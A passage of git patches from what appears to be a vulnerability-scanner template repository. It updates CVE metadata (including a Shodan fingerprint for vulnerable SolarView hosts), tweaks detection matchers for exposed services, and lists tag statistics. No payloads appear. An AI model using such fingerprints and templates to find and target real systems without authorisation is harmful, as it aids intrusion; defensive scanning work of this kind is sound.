deletion(-) diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml index ed0b04a00b..71ca0ccec7 100644 --- a/cves/2022/CVE-2022-40881.yaml +++ b/cves/2022/CVE-2022-40881.yaml @@ -11,10 +11,13 @@ info: - https://github.com/advisories/GHSA-wx3r-88rg-whxq - https://nvd.nist.gov/vuln/detail/CVE-2022-40881 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-40881 + cwe-id: CWE-77 metadata: - verified: true shodan-query: http.favicon.hash:"-244067125" + verified: "true" tags: cve,cve2022,solarview,rce,lfi variables: diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index 61622e6816..b636400b80 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -10,6 +10,7 @@ info: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 + - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: cve-id: CVE-2022-41840 metadata: From a3971916bddeb908ebb0433c6e899091075cacfb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 11:31:32 +0530 Subject: [PATCH 0488/1415] Update telnet-detect.yaml --- network/detection/telnet-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml index 72be6b1877..0f5d3261da 100644 --- a/network/detection/telnet-detect.yaml +++ b/network/detection/telnet-detect.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: port:23 telnet - tags: network,detect,telnet + tags: network,telnet network: - inputs: @@ -19,9 +19,9 @@ network: - "{{Hostname}}" - "{{Host}}:23" - matchers-condition: and matchers: - type: word words: - "Telnet" - "Login authentication" + condition: and From d1857180e1b23d6dc4c81e35a4d31887129bd206 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 11:46:36 +0530 Subject: [PATCH 0490/1415] Update unauth-mercurial.yaml --- misconfiguration/unauth-mercurial.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-mercurial.yaml b/misconfiguration/unauth-mercurial.yaml index 88eb3545af..3f2dc000fe 100644 --- a/misconfiguration/unauth-mercurial.yaml +++ b/misconfiguration/unauth-mercurial.yaml @@ -21,8 +21,8 @@ requests: words: - "Mercurial Repositories" - "Last modified" - condition: and + - type: status status: - 200 From fcfa7da69511d3533f1841c3b26756b38a97b1a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 11:52:23 +0530 Subject: [PATCH 0492/1415] Update wagtail-cms-detect.yaml --- exposed-panels/wagtail-cms-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wagtail-cms-detect.yaml b/exposed-panels/wagtail-cms-detect.yaml index 43d50dbd37..fa0ae5a151 100644 --- a/exposed-panels/wagtail-cms-detect.yaml +++ b/exposed-panels/wagtail-cms-detect.yaml @@ -14,8 +14,8 @@ requests: path: - '{{BaseURL}}/login/?next=/' - '{{BaseURL}}/admin/login/?next=/admin/' - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: word From 342c7ebbcc1841631886f73263b992201885b9cc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 12:14:12 +0530 Subject: [PATCH 0494/1415] Update blackbox-exporter-metrics.yaml --- misconfiguration/blackbox-exporter-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/blackbox-exporter-metrics.yaml b/misconfiguration/blackbox-exporter-metrics.yaml index e717ac42f0..4614569228 100644 --- a/misconfiguration/blackbox-exporter-metrics.yaml +++ b/misconfiguration/blackbox-exporter-metrics.yaml @@ -14,7 +14,7 @@ requests: path: - "{{BaseURL}}/metrics" - matchers-condition: or + matchers-condition: and matchers: - type: word part: body From c4920fb9874d2c8e5f15a5cdf4119f2ded49c385 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 21 Nov 2022 06:52:36 +0000 Subject: [PATCH 0496/1415] Auto Generated Templates Stats [Mon Nov 21 06:52:36 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4340 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 2194 insertions(+), 2168 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 524711ad89..82aaee0127 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1526},{"name":"panel","count":747},{"name":"edb","count":575},{"name":"xss","count":533},{"name":"exposure","count":525},{"name":"lfi","count":518},{"name":"wordpress","count":460},{"name":"cve2021","count":365},{"name":"wp-plugin","count":355},{"name":"rce","count":343},{"name":"tech","count":319},{"name":"packetstorm","count":291},{"name":"cve2022","count":255},{"name":"wpscan","count":247},{"name":"token-spray","count":235},{"name":"cve2020","count":217},{"name":"misconfig","count":212},{"name":"","count":195},{"name":"unauth","count":188},{"name":"wp","count":177},{"name":"kev","count":167},{"name":"config","count":162},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":129},{"name":"oast","count":127},{"name":"apache","count":124},{"name":"iot","count":122},{"name":"authenticated","count":117},{"name":"sqli","count":111},{"name":"cve2010","count":111},{"name":"router","count":90},{"name":"files","count":89},{"name":"redirect","count":89},{"name":"login","count":88},{"name":"devops","count":75},{"name":"takeover","count":74},{"name":"network","count":73},{"name":"token","count":73},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":64},{"name":"file","count":63},{"name":"oracle","count":62},{"name":"intrusive","count":59},{"name":"install","count":57},{"name":"seclists","count":56},{"name":"disclosure","count":54},{"name":"cisco","count":49},{"name":"cve2016","count":49},{"name":"oss","count":49},{"name":"google","count":48},{"name":"cve2015","count":47},{"name":"fileupload","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"vulhub","count":38},{"name":"vmware","count":38},{"name":"atlassian","count":38},{"name":"logs","count":37},{"name":"tenable","count":35},{"name":"traversal","count":35},{"name":"springboot","count":35},{"name":"injection","count":33},{"name":"hackerone","count":33},{"name":"jira","count":32},{"name":"listing","count":31},{"name":"huntr","count":29},{"name":"kubernetes","count":29},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"debug","count":26},{"name":"log4j","count":26},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"microsoft","count":24},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"misc","count":23},{"name":"php","count":22},{"name":"aws","count":22},{"name":"manageengine","count":21},{"name":"fuzz","count":21},{"name":"wp-theme","count":21},{"name":"zoho","count":21},{"name":"weblogic","count":20},{"name":"cloud","count":20},{"name":"cve2012","count":20},{"name":"deserialization","count":19},{"name":"cicd","count":19},{"name":"ibm","count":19},{"name":"api","count":19},{"name":"k8s","count":19},{"name":"tomcat","count":19},{"name":"camera","count":19},{"name":"dlink","count":18},{"name":"gitlab","count":18},{"name":"service","count":18},{"name":"ftp","count":17},{"name":"jenkins","count":17},{"name":"wavlink","count":17},{"name":"firewall","count":17},{"name":"printer","count":16},{"name":"struts","count":16},{"name":"nginx","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"xxe","count":15},{"name":"msf","count":14},{"name":"domainmod","count":14},{"name":"fortinet","count":14},{"name":"android","count":14},{"name":"hp","count":14},{"name":"java","count":14},{"name":"cve2013","count":13},{"name":"amazon","count":13},{"name":"lfr","count":13},{"name":"woocommerce","count":13},{"name":"confluence","count":13},{"name":"magento","count":13},{"name":"abstractapi","count":13},{"name":"status","count":13},{"name":"microweber","count":12},{"name":"ruijie","count":12},{"name":"netgear","count":12},{"name":"backup","count":12},{"name":"rails","count":12},{"name":"drupal","count":12},{"name":"cve2008","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"cisa","count":11},{"name":"github","count":11},{"name":"airflow","count":11},{"name":"fortigate","count":11},{"name":"azure","count":11},{"name":"backdoor","count":11},{"name":"vpn","count":11},{"name":"ssl","count":11},{"name":"cnvd2021","count":11},{"name":"webserver","count":11},{"name":"dell","count":10},{"name":"laravel","count":10},{"name":"coldfusion","count":10},{"name":"spring","count":10},{"name":"git","count":10},{"name":"django","count":10},{"name":"glpi","count":10},{"name":"jolokia","count":10},{"name":"grafana","count":10},{"name":"ruby","count":10},{"name":"zyxel","count":10},{"name":"sonicwall","count":9},{"name":"iis","count":9},{"name":"fastjson","count":9},{"name":"zimbra","count":9},{"name":"kube","count":9},{"name":"windows","count":9},{"name":"zabbix","count":9},{"name":"phpmyadmin","count":9},{"name":"ssti","count":9},{"name":"dedecms","count":9},{"name":"prometheus","count":9},{"name":"vcenter","count":9},{"name":"wso2","count":9},{"name":"citrix","count":8},{"name":"scada","count":8},{"name":"elasticsearch","count":8},{"name":"kafka","count":8},{"name":"metadata","count":8},{"name":"solr","count":8},{"name":"jboss","count":8},{"name":"cisco-switch","count":8},{"name":"recon","count":8},{"name":"mirai","count":8},{"name":"auth","count":8},{"name":"headless","count":8},{"name":"mail","count":8},{"name":"hms","count":8},{"name":"audit","count":8},{"name":"config-audit","count":8},{"name":"seeyon","count":7},{"name":"npm","count":7},{"name":"ssh","count":7},{"name":"squirrelmail","count":7},{"name":"maps","count":7},{"name":"nodejs","count":7},{"name":"druid","count":7},{"name":"bucket","count":7},{"name":"solarview","count":7},{"name":"opencats","count":7},{"name":"samsung","count":7},{"name":"blind","count":7},{"name":"jetbrains","count":7},{"name":"icewarp","count":7},{"name":"python","count":7},{"name":"cnvd2020","count":7},{"name":"symfony","count":7},{"name":"firebase","count":7},{"name":"docker","count":7},{"name":"go","count":7},{"name":"exchange","count":7},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"emerge","count":6},{"name":"db","count":6},{"name":"ofbiz","count":6},{"name":"jetty","count":6},{"name":"magmi","count":6},{"name":"ognl","count":6},{"name":"crlf","count":6},{"name":"zhiyuan","count":6},{"name":"microstrategy","count":6},{"name":"ecology","count":6},{"name":"setup","count":6},{"name":"sitecore","count":6},{"name":"jamf","count":6},{"name":"slack","count":6},{"name":"lucee","count":6},{"name":"moodle","count":6},{"name":"enum","count":6},{"name":"openvpn","count":6},{"name":"huawei","count":6},{"name":"artica","count":6},{"name":"fpd","count":6},{"name":"opensis","count":6},{"name":"vms","count":6},{"name":"rconfig","count":6},{"name":"bypass","count":6},{"name":"bigip","count":6},{"name":"cobbler","count":6},{"name":"activemq","count":6},{"name":"kubelet","count":6},{"name":"rfi","count":5},{"name":"cockpit","count":5},{"name":"elastic","count":5},{"name":"fortios","count":5},{"name":"prestashop","count":5},{"name":"metinfo","count":5},{"name":"gocd","count":5},{"name":"symantec","count":5},{"name":"scan","count":5},{"name":"nagios","count":5},{"name":"redis","count":5},{"name":"awstats","count":5},{"name":"filemanager","count":5},{"name":"apisix","count":5},{"name":"smtp","count":5},{"name":"firmware","count":5},{"name":"strapi","count":5},{"name":"74cms","count":5},{"name":"rseenet","count":5},{"name":"plesk","count":5},{"name":"circarlife","count":5},{"name":"database","count":5},{"name":"alibaba","count":5},{"name":"elfinder","count":5},{"name":"carrental","count":5},{"name":"minio","count":5},{"name":"avideo","count":5},{"name":"thinkphp","count":5},{"name":"leak","count":5},{"name":"cache","count":5},{"name":"solarwinds","count":5},{"name":"error","count":5},{"name":"gogs","count":5},{"name":"fatpipe","count":5},{"name":"parallels","count":5},{"name":"storage","count":5},{"name":"keycloak","count":5},{"name":"node","count":5},{"name":"admin","count":5},{"name":"cve2007","count":4},{"name":"panos","count":4},{"name":"hybris","count":4},{"name":"umbraco","count":4},{"name":"hashicorp","count":4},{"name":"prtg","count":4},{"name":"asp","count":4},{"name":"vbulletin","count":4},{"name":"axigen","count":4},{"name":"phpinfo","count":4},{"name":"caucho","count":4},{"name":"search","count":4},{"name":"openemr","count":4},{"name":"telerik","count":4},{"name":"puppet","count":4},{"name":"beyondtrust","count":4},{"name":"hoteldruid","count":4},{"name":"gnuboard","count":4},{"name":"kibana","count":4},{"name":"candidats","count":4},{"name":"resin","count":4},{"name":"horde","count":4},{"name":"thinkcmf","count":4},{"name":"stripe","count":4},{"name":"adminer","count":4},{"name":"sql","count":4},{"name":"hongdian","count":4},{"name":"sendgrid","count":4},{"name":"photo","count":4},{"name":"cacti","count":4},{"name":"mongodb","count":4},{"name":"tenda","count":4},{"name":"bmc","count":4},{"name":"ems","count":4},{"name":"flink","count":4},{"name":"paypal","count":4},{"name":"s3","count":4},{"name":"kevinlab","count":4},{"name":"tikiwiki","count":4},{"name":"artifactory","count":4},{"name":"oauth","count":4},{"name":"vrealize","count":4},{"name":"couchdb","count":4},{"name":"console","count":4},{"name":"ampache","count":4},{"name":"roxy","count":4},{"name":"terramaster","count":4},{"name":"gitea","count":4},{"name":"sonarqube","count":4},{"name":"linkerd","count":4},{"name":"nosqli","count":4},{"name":"kentico","count":4},{"name":"redmine","count":4},{"name":"jellyfin","count":4},{"name":"mailchimp","count":4},{"name":"sophos","count":4},{"name":"royalevent","count":4},{"name":"telesquare","count":4},{"name":"wcs","count":4},{"name":"postmessage","count":4},{"name":"cnvd2019","count":4},{"name":"hpe","count":4},{"name":"aspose","count":4},{"name":"sangfor","count":4},{"name":"zte","count":4},{"name":"hikvision","count":4},{"name":"oa","count":4},{"name":"phppgadmin","count":4},{"name":"voip","count":4},{"name":"springcloud","count":4},{"name":"xmlrpc","count":4},{"name":"yeswiki","count":4},{"name":"nexus","count":4},{"name":"weiphp","count":3},{"name":"consul","count":3},{"name":"nortek","count":3},{"name":"processwire","count":3},{"name":"ec2","count":3},{"name":"dzzoffice","count":3},{"name":"dreambox","count":3},{"name":"nuuo","count":3},{"name":"lansweeper","count":3},{"name":"3cx","count":3},{"name":"ansible","count":3},{"name":"messaging","count":3},{"name":"actuator","count":3},{"name":"samba","count":3},{"name":"blockchain","count":3},{"name":"openam","count":3},{"name":"mongo","count":3},{"name":"geowebserver","count":3},{"name":"pip","count":3},{"name":"dotcms","count":3},{"name":"fuelcms","count":3},{"name":"r-seenet","count":3},{"name":"rocketchat","count":3},{"name":"geoserver","count":3},{"name":"tableau","count":3},{"name":"grav","count":3},{"name":"goanywhere","count":3},{"name":"pentaho","count":3},{"name":"unifi","count":3},{"name":"redash","count":3},{"name":"avtech","count":3},{"name":"glassfish","count":3},{"name":"kingsoft","count":3},{"name":"ebs","count":3},{"name":"express","count":3},{"name":"intercom","count":3},{"name":"lotus","count":3},{"name":"graylog","count":3},{"name":"pfsense","count":3},{"name":"webmin","count":3},{"name":"drawio","count":3},{"name":"servicenow","count":3},{"name":"octobercms","count":3},{"name":"typo3","count":3},{"name":"mautic","count":3},{"name":"square","count":3},{"name":"axis","count":3},{"name":"openbmcs","count":3},{"name":"bigant","count":3},{"name":"bitrix","count":3},{"name":"facebook","count":3},{"name":"kfm","count":3},{"name":"httpserver","count":3},{"name":"smb","count":3},{"name":"empirecms","count":3},{"name":"bitbucket","count":3},{"name":"panabit","count":3},{"name":"aptus","count":3},{"name":"fileman","count":3},{"name":"technology","count":3},{"name":"metabase","count":3},{"name":"trendnet","count":3},{"name":"thinfinity","count":3},{"name":"linksys","count":3},{"name":"mobileiron","count":3},{"name":"finecms","count":3},{"name":"labkey","count":3},{"name":"digitalrebar","count":3},{"name":"elementor","count":3},{"name":"wordfence","count":3},{"name":"microfocus","count":3},{"name":"buffalo","count":3},{"name":"ivanti","count":3},{"name":"bruteforce","count":3},{"name":"httpbin","count":3},{"name":"sharepoint","count":3},{"name":"webmail","count":3},{"name":"odoo","count":3},{"name":"openfire","count":3},{"name":"ampps","count":3},{"name":"ruckus","count":3},{"name":"key","count":3},{"name":"jupyter","count":3},{"name":"cve2005","count":3},{"name":"log","count":3},{"name":"detect","count":3},{"name":"heroku","count":3},{"name":"splunk","count":3},{"name":"mantisbt","count":3},{"name":"concrete","count":3},{"name":"netdata","count":3},{"name":"axis2","count":3},{"name":"codeigniter","count":3},{"name":"jfrog","count":3},{"name":"rlm","count":3},{"name":"synology","count":3},{"name":"digitalocean","count":3},{"name":"dolibarr","count":3},{"name":"sentry","count":3},{"name":"proftpd","count":3},{"name":"rabbitmq","count":3},{"name":"yonyou","count":3},{"name":"circleci","count":3},{"name":"kkfileview","count":3},{"name":"trixbox","count":3},{"name":"globalprotect","count":3},{"name":"modem","count":3},{"name":"mcafee","count":3},{"name":"zend","count":3},{"name":"selea","count":3},{"name":"epson","count":3},{"name":"httpd","count":3},{"name":"getsimple","count":3},{"name":"netlify","count":3},{"name":"seagate","count":3},{"name":"graph","count":3},{"name":"thruk","count":3},{"name":"cloudflare","count":3},{"name":"targa","count":3},{"name":"dom","count":3},{"name":"hsphere","count":3},{"name":"harbor","count":3},{"name":"nacos","count":3},{"name":"voipmonitor","count":3},{"name":"subrion","count":3},{"name":"jeesns","count":3},{"name":"matrix","count":3},{"name":"centos","count":3},{"name":"teamcity","count":3},{"name":"movable","count":3},{"name":"zeroshell","count":3},{"name":"qnap","count":3},{"name":"sugarcrm","count":3},{"name":"fanruan","count":3},{"name":"rackn","count":3},{"name":"webadmin","count":3},{"name":"steve","count":3},{"name":"wapples","count":2},{"name":"yapi","count":2},{"name":"blesta","count":2},{"name":"flightpath","count":2},{"name":"jitsi","count":2},{"name":"nordex","count":2},{"name":"tongda","count":2},{"name":"aruba","count":2},{"name":"linux","count":2},{"name":"flatpress","count":2},{"name":"spark","count":2},{"name":"projectsend","count":2},{"name":"xceedium","count":2},{"name":"contao","count":2},{"name":"werkzeug","count":2},{"name":"angular","count":2},{"name":"tapestry","count":2},{"name":"xampp","count":2},{"name":"pmb","count":2},{"name":"synopsys","count":2},{"name":"checkpoint","count":2},{"name":"natshell","count":2},{"name":"gateway","count":2},{"name":"chiyu","count":2},{"name":"erxes","count":2},{"name":"impresscms","count":2},{"name":"xnat","count":2},{"name":"atmail","count":2},{"name":"viewpoint","count":2},{"name":"ispy","count":2},{"name":"oidc","count":2},{"name":"ubnt","count":2},{"name":"orchid","count":2},{"name":"webcam","count":2},{"name":"embed","count":2},{"name":"domxss","count":2},{"name":"novnc","count":2},{"name":"emqx","count":2},{"name":"watchguard","count":2},{"name":"vscode","count":2},{"name":"phpstorm","count":2},{"name":"iptime","count":2},{"name":"favicon","count":2},{"name":"hostheader-injection","count":2},{"name":"avada","count":2},{"name":"lighttpd","count":2},{"name":"resourcespace","count":2},{"name":"xerox","count":2},{"name":"pulse","count":2},{"name":"virtua","count":2},{"name":"ilo","count":2},{"name":"metersphere","count":2},{"name":"neos","count":2},{"name":"cassandra","count":2},{"name":"workspaceone","count":2},{"name":"hospital","count":2},{"name":"sass","count":2},{"name":"bash","count":2},{"name":"places","count":2},{"name":"secret","count":2},{"name":"rosariosis","count":2},{"name":"cloudinary","count":2},{"name":"bitly","count":2},{"name":"tileserver","count":2},{"name":"netis","count":2},{"name":"code42","count":2},{"name":"openssh","count":2},{"name":"ovirt","count":2},{"name":"qcubed","count":2},{"name":"payara","count":2},{"name":"pam","count":2},{"name":"homematic","count":2},{"name":"loqate","count":2},{"name":"globaldomains","count":2},{"name":"aqua","count":2},{"name":"draytek","count":2},{"name":"wwbn","count":2},{"name":"forcepoint","count":2},{"name":"discourse","count":2},{"name":"qihang","count":2},{"name":"ambari","count":2},{"name":"eshop","count":2},{"name":"unisharp","count":2},{"name":"akkadian","count":2},{"name":"owasp","count":2},{"name":"portal","count":2},{"name":"gespage","count":2},{"name":"chyrp","count":2},{"name":"azkaban","count":2},{"name":"cas","count":2},{"name":"gcp","count":2},{"name":"j2ee","count":2},{"name":"backups","count":2},{"name":"jeedom","count":2},{"name":"sas","count":2},{"name":"dos","count":2},{"name":"casdoor","count":2},{"name":"gitbook","count":2},{"name":"zzcms","count":2},{"name":"eris","count":2},{"name":"books","count":2},{"name":"showdoc","count":2},{"name":"pcoip","count":2},{"name":"gitblit","count":2},{"name":"tidb","count":2},{"name":"hasura","count":2},{"name":"netsus","count":2},{"name":"puppetdb","count":2},{"name":"opsview","count":2},{"name":"matomo","count":2},{"name":"osticket","count":2},{"name":"mybb","count":2},{"name":"exacqvision","count":2},{"name":"airtame","count":2},{"name":"openwrt","count":2},{"name":"intellian","count":2},{"name":"omnia","count":2},{"name":"sqlite","count":2},{"name":"xml","count":2},{"name":"sdwan","count":2},{"name":"xoops","count":2},{"name":"xweb500","count":2},{"name":"conductor","count":2},{"name":"nextcloud","count":2},{"name":"zerof","count":2},{"name":"idrac","count":2},{"name":"dlp","count":2},{"name":"couchbase","count":2},{"name":"javascript","count":2},{"name":"allied","count":2},{"name":"akamai","count":2},{"name":"ixcache","count":2},{"name":"h3c","count":2},{"name":"vigorconnect","count":2},{"name":"gryphon","count":2},{"name":"corebos","count":2},{"name":"swagger","count":2},{"name":"dashboard","count":2},{"name":"glances","count":2},{"name":"bomgar","count":2},{"name":"twitter","count":2},{"name":"pacsone","count":2},{"name":"text","count":2},{"name":"gitlist","count":2},{"name":"traefik","count":2},{"name":"myfactory","count":2},{"name":"flir","count":2},{"name":"veeam","count":2},{"name":"zywall","count":2},{"name":"eprints","count":2},{"name":"nasos","count":2},{"name":"scriptcase","count":2},{"name":"dubbo","count":2},{"name":"temenos","count":2},{"name":"wooyun","count":2},{"name":"shenyu","count":2},{"name":"electron","count":2},{"name":"forum","count":2},{"name":"aviatrix","count":2},{"name":"tplink","count":2},{"name":"mikrotik","count":2},{"name":"middleware","count":2},{"name":"guacamole","count":2},{"name":"fortimail","count":2},{"name":"shellshock","count":2},{"name":"seowon","count":2},{"name":"lantronix","count":2},{"name":"csrf","count":2},{"name":"vidyo","count":2},{"name":"uwsgi","count":2},{"name":"eyesofnetwork","count":2},{"name":"phpshowtime","count":2},{"name":"dokuwiki","count":2},{"name":"redhat","count":2},{"name":"kettle","count":2},{"name":"idea","count":2},{"name":"motorola","count":2},{"name":"mailgun","count":2},{"name":"servicedesk","count":2},{"name":"hiveos","count":2},{"name":"frontpage","count":2},{"name":"reolink","count":2},{"name":"webpagetest","count":2},{"name":"ad","count":2},{"name":"kong","count":2},{"name":"circontrol","count":2},{"name":"password","count":2},{"name":"rackstation","count":2},{"name":"openresty","count":2},{"name":"phpcollab","count":2},{"name":"ecoa","count":2},{"name":"xsuite","count":2},{"name":"clusterengine","count":2},{"name":"zms","count":2},{"name":"testrail","count":2},{"name":"dotnetnuke","count":2},{"name":"versa","count":2},{"name":"teampass","count":2},{"name":"octoprint","count":2},{"name":"accela","count":2},{"name":"syslog","count":2},{"name":"froxlor","count":2},{"name":"zblogphp","count":2},{"name":"skycaiji","count":2},{"name":"saltstack","count":2},{"name":"avantfax","count":2},{"name":"gophish","count":2},{"name":"piwigo","count":2},{"name":"plastic","count":2},{"name":"seacms","count":2},{"name":"pgadmin","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"livezilla","count":2},{"name":"rockmongo","count":2},{"name":"horizon","count":2},{"name":"loytec","count":2},{"name":"wuzhicms","count":2},{"name":"aerohive","count":2},{"name":"rancher","count":2},{"name":"smartstore","count":2},{"name":"zzzcms","count":2},{"name":"pascom","count":2},{"name":"javamelody","count":2},{"name":"jmx","count":2},{"name":"commax","count":2},{"name":"dotnet","count":2},{"name":"openstack","count":2},{"name":"totemomail","count":2},{"name":"fortiweb","count":2},{"name":"pega","count":2},{"name":"clansphere","count":2},{"name":"yii","count":2},{"name":"sourcecodester","count":2},{"name":"mbean","count":2},{"name":"avaya","count":2},{"name":"ucmdb","count":2},{"name":"idor","count":2},{"name":"itop","count":2},{"name":"dvwa","count":2},{"name":"ebook","count":2},{"name":"atom","count":2},{"name":"dynamicweb","count":2},{"name":"hjtcloud","count":2},{"name":"ranger","count":2},{"name":"gradle","count":2},{"name":"kiwitcms","count":2},{"name":"influxdb","count":2},{"name":"sniplets","count":2},{"name":"otobo","count":2},{"name":"netflix","count":2},{"name":"appcms","count":2},{"name":"alfresco","count":2},{"name":"apollo","count":2},{"name":"eko","count":2},{"name":"rstudio","count":2},{"name":"cyberoam","count":2},{"name":"terraform","count":2},{"name":"hadoop","count":2},{"name":"xxljob","count":2},{"name":"apple","count":2},{"name":"wamp","count":2},{"name":"clamav","count":2},{"name":"arcgis","count":2},{"name":"node-red-dashboard","count":2},{"name":"hubspot","count":2},{"name":"dvr","count":2},{"name":"ghost","count":2},{"name":"highmail","count":2},{"name":"acrolinx","count":2},{"name":"codemeter","count":2},{"name":"jquery","count":2},{"name":"chamilo","count":2},{"name":"sequoiadb","count":2},{"name":"webalizer","count":2},{"name":"xenmobile","count":2},{"name":"livehelperchat","count":2},{"name":"pbootcms","count":2},{"name":"netscaler","count":2},{"name":"cargo","count":2},{"name":"ametys","count":2},{"name":"bigbluebutton","count":2},{"name":"carel","count":2},{"name":"eventum","count":2},{"name":"kafdrop","count":2},{"name":"listserv","count":2},{"name":"linkedin","count":2},{"name":"nextjs","count":2},{"name":"seeddms","count":2},{"name":"jsf","count":2},{"name":"graphite","count":2},{"name":"wildfly","count":2},{"name":"superset","count":2},{"name":"audiocodes","count":2},{"name":"kkFileView","count":2},{"name":"apereo","count":2},{"name":"wpqa","count":2},{"name":"landesk","count":2},{"name":"rundeck","count":2},{"name":"espeasy","count":2},{"name":"newrelic","count":2},{"name":"xiaomi","count":2},{"name":"frp","count":2},{"name":"f5","count":2},{"name":"cocoon","count":2},{"name":"cgi","count":2},{"name":"adiscon","count":2},{"name":"mysql","count":2},{"name":"igs","count":2},{"name":"supermicro","count":2},{"name":"telnet","count":2},{"name":"weather","count":2},{"name":"owncloud","count":2},{"name":"alienvault","count":2},{"name":"konga","count":2},{"name":"sidekiq","count":2},{"name":"craftcms","count":2},{"name":"emby","count":2},{"name":"cve2006","count":2},{"name":"dataiku","count":2},{"name":"virtualui","count":2},{"name":"sysaid","count":2},{"name":"mida","count":2},{"name":"auerswald","count":2},{"name":"default-page","count":2},{"name":"kavita","count":2},{"name":"overflow","count":2},{"name":"fastcgi","count":2},{"name":"fiori","count":2},{"name":"ericsson","count":2},{"name":"docs","count":2},{"name":"serpstack","count":1},{"name":"activeadmin","count":1},{"name":"solarlog","count":1},{"name":"biqsdrive","count":1},{"name":"covalent","count":1},{"name":"shopizer","count":1},{"name":"locust","count":1},{"name":"rsvpmaker","count":1},{"name":"getgrav","count":1},{"name":"exponentcms","count":1},{"name":"javafaces","count":1},{"name":"launchdarkly","count":1},{"name":"slocum","count":1},{"name":"honeywell","count":1},{"name":"tamronos","count":1},{"name":"chuangtian","count":1},{"name":"management","count":1},{"name":"addpac","count":1},{"name":"activecollab","count":1},{"name":"orbiteam","count":1},{"name":"badgeos","count":1},{"name":"wp-gdpr-compliance","count":1},{"name":"scimono","count":1},{"name":"xyxel","count":1},{"name":"filetransfer","count":1},{"name":"webasyst","count":1},{"name":"smuggling","count":1},{"name":"upload","count":1},{"name":"headers","count":1},{"name":"bing","count":1},{"name":"shoretel","count":1},{"name":"nimble","count":1},{"name":"identityguard","count":1},{"name":"dicoogle","count":1},{"name":"pushgateway","count":1},{"name":"yachtcontrol","count":1},{"name":"petfinder","count":1},{"name":"opencast","count":1},{"name":"liberty","count":1},{"name":"cvnd2018","count":1},{"name":"aura","count":1},{"name":"microcomputers","count":1},{"name":"3dprint","count":1},{"name":"klog","count":1},{"name":"supervisor","count":1},{"name":"scs","count":1},{"name":"vivotex","count":1},{"name":"ubiquiti","count":1},{"name":"timezone","count":1},{"name":"cerebro","count":1},{"name":"sftp","count":1},{"name":"bonita","count":1},{"name":"acemanager","count":1},{"name":"spinnaker","count":1},{"name":"emc","count":1},{"name":"pippoint","count":1},{"name":"edgeos","count":1},{"name":"maxsite","count":1},{"name":"locations","count":1},{"name":"somansa","count":1},{"name":"tor","count":1},{"name":"oscommerce","count":1},{"name":"karma","count":1},{"name":"idemia","count":1},{"name":"iucn","count":1},{"name":"xdcms","count":1},{"name":"moin","count":1},{"name":"librenms","count":1},{"name":"opencti","count":1},{"name":"csrfguard","count":1},{"name":"vnc","count":1},{"name":"purestorage","count":1},{"name":"webmodule-ee","count":1},{"name":"formcraft3","count":1},{"name":"iterable","count":1},{"name":"lg-nas","count":1},{"name":"filr","count":1},{"name":"gargoyle","count":1},{"name":"gopher","count":1},{"name":"vanguard","count":1},{"name":"fortilogger","count":1},{"name":"phpsocialnetwork","count":1},{"name":"myanimelist","count":1},{"name":"logger1000","count":1},{"name":"room-alert","count":1},{"name":"cscart","count":1},{"name":"solman","count":1},{"name":"front","count":1},{"name":"oliver","count":1},{"name":"atg","count":1},{"name":"domos","count":1},{"name":"weboftrust","count":1},{"name":"tensorboard","count":1},{"name":"darkstat","count":1},{"name":"geniusocean","count":1},{"name":"webshell","count":1},{"name":"tpshop","count":1},{"name":"tls","count":1},{"name":"fastvue","count":1},{"name":"patheon","count":1},{"name":"web3","count":1},{"name":"fuji","count":1},{"name":"sceditor","count":1},{"name":"amp","count":1},{"name":"cvent","count":1},{"name":"fatwire","count":1},{"name":"phpbb","count":1},{"name":"jumpcloud","count":1},{"name":"jobsearch","count":1},{"name":"contentful","count":1},{"name":"messenger","count":1},{"name":"opencart","count":1},{"name"